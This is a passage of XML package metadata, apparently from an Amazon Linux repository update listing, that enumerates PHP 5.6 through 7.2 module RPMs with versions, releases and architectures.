arch="x86_64"><filename>Packages/php70-imap-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-gmp" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-gmp-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-tidy" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-tidy-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-json" version="7.0.33" release="1.32.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php70-json-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-mcrypt" version="7.0.33" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mcrypt-7.0.33-1.32.amzn1.x86_64.rpm</filename></package><package name="php70-soap" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-soap-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-json" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-json-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-mbstring" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mbstring-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-opcache" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-opcache-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-tidy" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-tidy-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-xml" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-xml-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-gd" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-gd-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-common" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-common-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-snmp" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-snmp-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-gmp" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-gmp-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-ldap" version="7.0.33" release="1.32.amzn1" epoch="0" 
arch="i686"><filename>Packages/php70-ldap-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-mysqlnd" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mysqlnd-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-mcrypt" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mcrypt-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-pdo" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pdo-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-embedded" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-embedded-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-process" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-process-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-intl" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-intl-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-bcmath" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-bcmath-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-recode" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-recode-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-xmlrpc" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-xmlrpc-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-pdo-dblib" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pdo-dblib-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-cli" version="7.0.33" release="1.32.amzn1" 
epoch="0" arch="i686"><filename>Packages/php70-cli-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-pspell" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pspell-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-dba" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-dba-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-dbg" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-dbg-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-odbc" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-odbc-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-enchant" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-enchant-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-fpm" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-fpm-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-pgsql" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pgsql-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-devel" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-devel-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-zip" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-zip-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-imap" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-imap-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php70-debuginfo" version="7.0.33" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/php70-debuginfo-7.0.33-1.32.amzn1.i686.rpm</filename></package><package name="php56-dbg" version="5.6.39" release="1.141.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php56-dbg-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-mssql" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mssql-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-tidy" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-tidy-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-intl" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-intl-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-dba" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dba-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-pdo" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pdo-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-cli" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-cli-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-common" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-common-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-embedded" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-embedded-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-ldap" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-ldap-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-pspell" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pspell-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-fpm" 
version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-fpm-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-debuginfo" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-debuginfo-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-mysqlnd" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mysqlnd-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-gmp" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gmp-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-xml" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xml-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-pgsql" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pgsql-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-bcmath" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-bcmath-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-gd" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gd-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-opcache" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-opcache-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-devel" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-devel-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-xmlrpc" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xmlrpc-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-recode" version="5.6.39" release="1.141.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php56-recode-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-process" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-process-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-mbstring" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mbstring-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-enchant" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-enchant-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-imap" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-imap-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-soap" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-soap-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-mcrypt" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mcrypt-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-odbc" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-odbc-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-snmp" version="5.6.39" release="1.141.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-snmp-5.6.39-1.141.amzn1.x86_64.rpm</filename></package><package name="php56-xml" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xml-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-pdo" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pdo-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-dbg" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dbg-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-ldap" 
version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-ldap-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-mbstring" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mbstring-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-dba" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dba-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-cli" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-cli-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-process" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-process-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-common" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-common-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-odbc" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-odbc-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-xmlrpc" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xmlrpc-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-devel" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-devel-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-mysqlnd" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mysqlnd-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-opcache" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-opcache-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-fpm" version="5.6.39" release="1.141.amzn1" epoch="0" 
arch="i686"><filename>Packages/php56-fpm-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-debuginfo" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-debuginfo-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-embedded" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-embedded-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-gd" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gd-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-imap" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-imap-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-enchant" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-enchant-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-mssql" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mssql-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-soap" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-soap-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-mcrypt" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mcrypt-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-bcmath" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-bcmath-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-tidy" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-tidy-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-gmp" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gmp-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-intl" version="5.6.39" 
release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-intl-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-recode" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-recode-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-pgsql" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pgsql-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-snmp" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-snmp-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php56-pspell" version="5.6.39" release="1.141.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pspell-5.6.39-1.141.amzn1.i686.rpm</filename></package><package name="php71-bcmath" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-bcmath-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-snmp" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-snmp-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-pspell" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pspell-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-mbstring" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mbstring-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-pdo-dblib" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pdo-dblib-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-mysqlnd" version="7.1.25" release="1.35.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php71-mysqlnd-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-embedded" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-embedded-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-debuginfo" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-debuginfo-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-cli" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-cli-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-devel" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-devel-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-dbg" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-dbg-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-common" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-common-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-odbc" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-odbc-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-soap" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-soap-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-xmlrpc" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-xmlrpc-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-xml" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-xml-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-tidy" version="7.1.25" 
release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-tidy-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-json" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-json-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-imap" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-imap-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-intl" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-intl-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-gmp" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-gmp-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-fpm" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-fpm-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-recode" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-recode-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-opcache" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-opcache-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-mcrypt" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mcrypt-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-dba" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-dba-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-pgsql" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pgsql-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-pdo" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pdo-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package 
name="php71-process" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-process-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-enchant" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-enchant-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-ldap" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-ldap-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-gd" version="7.1.25" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-gd-7.1.25-1.35.amzn1.x86_64.rpm</filename></package><package name="php71-common" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-common-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-enchant" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-enchant-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-intl" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-intl-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-pdo-dblib" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pdo-dblib-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-debuginfo" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-debuginfo-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-tidy" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-tidy-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-gmp" version="7.1.25" release="1.35.amzn1" epoch="0" 
arch="i686"><filename>Packages/php71-gmp-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-bcmath" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-bcmath-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-embedded" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-embedded-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-fpm" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-fpm-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-gd" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-gd-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-cli" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-cli-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-pgsql" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pgsql-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-snmp" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-snmp-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-ldap" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-ldap-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-xml" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-xml-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-dbg" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-dbg-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-odbc" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-odbc-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-json" version="7.1.25" release="1.35.amzn1" epoch="0" 
arch="i686"><filename>Packages/php71-json-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-xmlrpc" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-xmlrpc-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-imap" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-imap-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-mysqlnd" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mysqlnd-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-devel" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-devel-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-mcrypt" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mcrypt-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-recode" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-recode-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-process" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-process-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-opcache" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-opcache-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-dba" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-dba-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-soap" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-soap-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-pdo" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pdo-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-pspell" version="7.1.25" release="1.35.amzn1" epoch="0" 
arch="i686"><filename>Packages/php71-pspell-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php71-mbstring" version="7.1.25" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mbstring-7.1.25-1.35.amzn1.i686.rpm</filename></package><package name="php72-dba" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dba-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-cli" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-cli-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-debuginfo" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-debuginfo-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-odbc" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-odbc-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-xml" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xml-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-gd" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gd-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-devel" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-devel-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-snmp" version="7.2.13" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-snmp-7.2.13-1.7.amzn1.x86_64.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.13" release="1.7.amzn1" 